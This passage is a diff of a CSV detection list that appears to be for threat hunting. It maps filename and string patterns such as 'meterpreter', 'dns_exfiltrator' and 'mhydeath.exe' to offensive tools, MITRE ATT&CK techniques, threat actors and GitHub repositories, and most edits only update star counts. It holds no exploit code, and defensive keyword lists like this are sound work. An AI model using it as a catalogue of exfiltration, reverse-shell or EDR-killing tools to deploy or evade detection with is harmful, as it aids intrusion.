- T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*MetasploitPayload.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1149","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*metasploitframework*.msi*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*MetasploitPayload.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1149","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*metatwin.ps1*","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","1","N/A","9","4","303","72","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" "*metatwin-master*","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","1","N/A","9","4","303","72","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" -"*meterpreter*.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*meterpreter*.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*meterpreter.*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*Meterpreter.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*meterpreter.sl*","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. 
recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t0v3rr1d3/armitage","1","1","N/A","N/A","1","81","15","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z" -"*meterpreter_*.rb","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*meterpreter_*.rb","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. 
By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*meterpreter_loader*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*METERPRETER_STAGER*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*MeteTool*","offensive_tool_keyword","MeteTool","Metatool Minetest mod provides API for registering metadata manipulation tools and other tools primarily focused on special node data operations.","T1059.003 - T1064 - T1135 - T1059.007","TA0002 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/S-S-X/metatool","1","0","N/A","N/A","1","2","1","2023-06-10T06:24:14Z","2020-05-09T19:09:17Z" "*methodHash*528465795*","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","0","N/A","N/A","2","178","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" 
-"*methods::dns::dns_exfiltrator*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
-"*methods::https::https_exfiltrator*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
-"*methods::icmp::icmp_exfiltrator*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
+"*methods::dns::dns_exfiltrator*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
+"*methods::https::https_exfiltrator*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
+"*methods::icmp::icmp_exfiltrator*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "*Metro-Holografix/CSExec*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10","","N/A","","","" "*Metro-Holografix/Dinjector*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10","","N/A","","","" "*metsrv.dll*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" -"*metterpreter*","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","1","N/A","N/A","10","1555","675","2023-10-02T13:11:58Z","2014-04-03T21:18:24Z" +"*metterpreter*","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","1","N/A","N/A","10","1555","675","2023-10-04T11:56:37Z","2014-04-03T21:18:24Z" "*MFASweep.ps1*","offensive_tool_keyword","FMFASweep","A tool for checking if MFA is enabled on multiple Microsoft Services","T1595 - T1595.002 - T1078.003","TA0006 - TA0009","N/A","N/A","Exploitation 
tools","https://github.com/dafthack/MFASweep","1","1","N/A","9","10","1033","152","2023-07-25T05:10:55Z","2020-09-22T16:25:03Z" -"*mgeeky/PackMyPayload*","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","10","8","726","123","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z" -"*mgeeky/RedWarden*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*mgeeky/PackMyPayload*","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to 
evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","10","8","729","123","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z" +"*mgeeky/RedWarden*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*mhaskar/Octopus*","offensive_tool_keyword","octopus","Octopus is an open source. 
pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*mhuzaifi0604/spellbound*","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","1","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" -"*mhydeath.exe*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","251","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" -"*mhydeath-master*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","251","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" +"*mhydeath.exe*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","253","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" +"*mhydeath-master*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","253","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" "*micahvandeusen/gMSADumper*","offensive_tool_keyword","gMSADumper","Lists who can read any gMSA password 
blobs and parses them if the current user has access.","T1552.001 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/micahvandeusen/gMSADumper","1","1","N/A","N/A","2","190","34","2023-08-23T13:32:49Z","2021-04-10T00:15:24Z" "*micr0 shell.py*","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","1","N/A","9","1","91","12","2023-09-16T02:35:28Z","2023-08-13T02:46:51Z" "*micr0_shell-main*","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","1","N/A","9","1","91","12","2023-09-16T02:35:28Z","2023-08-13T02:46:51Z" "*micr0shell.py *","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","1","N/A","9","1","91","12","2023-09-16T02:35:28Z","2023-08-13T02:46:51Z" "*microbrownys.strangled.net*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" -"*MicroBurst.psm1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - 
TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" -"*MicroBurst-Az.psm1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" -"*MicroBurst-AzureAD*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" -"*MicroBurst-AzureREST*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" -"*MicroBurst-AzureRM*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" -"*MicroBurst-master*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" -"*MicroBurst-Misc.psm1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - 
T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" -"*MicroBurst-MSOL*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*MicroBurst.psm1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*MicroBurst-Az.psm1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*MicroBurst-AzureAD*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*MicroBurst-AzureREST*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*MicroBurst-AzureRM*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - 
